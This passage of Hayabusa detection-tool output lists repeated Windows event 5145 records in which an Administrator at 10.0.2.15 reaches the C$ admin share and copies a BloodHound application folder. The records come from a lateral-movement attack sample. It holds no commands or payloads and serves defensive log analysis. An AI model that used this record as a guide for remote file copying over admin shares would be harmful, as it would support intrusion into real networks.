Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 